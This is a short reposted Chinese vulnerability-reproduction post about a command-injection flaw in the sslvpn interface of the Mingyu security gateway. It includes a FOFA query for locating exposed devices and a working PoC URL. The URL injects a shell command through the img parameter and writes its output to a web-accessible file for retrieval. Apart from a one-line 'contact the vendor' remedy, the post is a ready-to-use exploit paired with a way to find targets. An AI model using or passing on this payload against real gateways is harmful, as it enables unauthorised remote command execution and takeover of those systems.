【漏洞复现】某厂商明御安全网关sslvpn命令执行漏洞
Nx01 产品简介
明御安全网关是杭州安恒信息技术股份有限公司研发的一款智慧化安全网关产品。这款产品秉持安全可视、简单有效的理念,以资产为视角,构建了全流程防御的下一代安全防护体系。
Nx02 漏洞描述
明御安全网关存在sslvpn命令执行漏洞,攻击者可通过此漏洞获取服务器控制权限。
Nx03 产品主页
fofa-query: web.body="明御安全网关"
Nx04 漏洞复现
POC:
/sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60ifconfig%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls
拼接URL/sslvpn/ceshi.txt
Nx05 修复建议
建议联系软件厂商进行处理。
原文地址:https://blog.csdn.net/qq_37113223/article/details/136413510
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!